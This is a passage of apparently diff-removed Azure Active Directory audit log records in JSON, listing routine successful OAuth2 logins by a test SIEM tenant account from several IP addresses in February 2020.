"AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "391870e6-1729-40ae-9ebb-51e0652fec9b"}
-{"InterSystemsId": "30e5377b-31d8-42c2-8170-13404afacde7", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:49", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8971516f-3ef3-4de0-b6b8-ebfae386bc00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a7538fb0-3213-41dc-ab38-1aed787e0cdc"}
-{"InterSystemsId": "32e2f533-40fb-4783-8c66-d1bad7e1cc88", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "74ab94ce-8928-4aff-8fa2-a66ad6d41f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e2a15fc0-6892-41f5-a41c-e515231cbb0a"}
-{"InterSystemsId": "3c5d16f4-16a6-45f4-a53d-abb86e35005b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:08", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f67a1615-4606-4673-b6fb-68f716345800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e11538ff-5fe1-4fdd-8c5d-219d85c47bb3"}
-{"InterSystemsId": "40077a75-7b58-4623-a64a-f1b7de70fa54", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:27", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e031670b-bb84-45ee-94ff-0e70a8cd1138"}
-{"InterSystemsId": "425503c9-ccbf-4674-8f1e-4d56510474fd", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:54", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "37.29.234.179", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "37.29.234.179", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "57ef1056-6ce2-424a-b241-ce3939d00900", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d39944c4-6766-4a89-8d5a-c789175830ee"}
-{"InterSystemsId": "4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:12", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "0c8fcffc-a810-4a85-b8e2-3a2fda925c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "6f2b7716-1acc-450d-ae13-afad7e02d07e"}
-{"InterSystemsId": "4542ce7e-270b-435e-8f81-ee23ea74be75", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:35", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9718abaa-220e-49c5-8c9b-588d32b8db00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "47f3c440-3fb7-4b5e-9c20-455470b289d2"}
-{"InterSystemsId": "4836e306-1460-4f34-ab55-a74c9a14f50d", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:38:40", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "37.29.234.179", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "37.29.234.179", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "2fde8302-c39e-40b6-9c7f-1bb9d4800a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "5a3435d0-229a-41c8-bd21-b4f2b662d0f6"}
-{"InterSystemsId": "4a50a549-adf3-4a22-9037-7fd8cd3d0116", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1d856a16-b179-41ab-9c0d-af1d2b925100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "5aff2d1c-b203-46a6-96f0-b8f908f0e968"}
-{"InterSystemsId": "4e44a55e-9c0d-4cea-b000-1b79e96dcf57", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "fc33c54e-38b9-4ef2-a4ee-a3a324a45500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3d8033cf-eecd-4eee-87a5-795efd8a1d3d"}
-{"InterSystemsId": "4e91c3e1-819e-4ebc-ae68-2037cfc2db92", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:25", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "a063e495-5883-4837-8186-5828f9f2d500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8bd0a250-74f6-4eeb-ba20-c5bdbd977013"}
-{"InterSystemsId": "50d648cb-466d-4cf4-b2f8-3b7e84f47040", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:04", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "08e18876-6177-487e-b8b5-cf950c1e598c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "64613cae-510d-4a52-b486-070b775e5800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558"}
-{"InterSystemsId": "5a453031-0cc3-4577-a589-4c3bf37eed78", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:45", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "814a32f0-27fd-4e82-855c-13da15a4c300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "19d57a4a-d32e-4dc6-971f-3491bc440023"}
-{"InterSystemsId": "5cd6215d-e206-4c3f-805d-6e386cbdab7a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9c218a27-ed51-4011-8383-e76850e85000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "0b158f74-e223-43c8-9cfd-5f4442f29fc7"}
-{"InterSystemsId": "612b339f-1088-a000-f25f-9c8af4d57894", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "00000003-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "4819a0c2-2050-4549-ab66-f5b90cbbcc5a"}
-{"InterSystemsId": "61eb5713-2687-4c00-a7b2-fde4788c395b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:29", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "3db9a461-6dd1-4950-b3e3-fbe8c2d5c700", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e94002d9-f6e8-46f9-8702-2a29e908e73d"}
-{"InterSystemsId": "61f81224-65fd-4c1b-b388-ee0e25485191", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "dc0cc415-9a00-470d-bda3-867e11fdd400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "1ca4f684-3a34-44a8-99b8-064d1071768a"}
-{"InterSystemsId": "661f2330-3e04-483d-9781-caaa4543cc13", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:50", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": 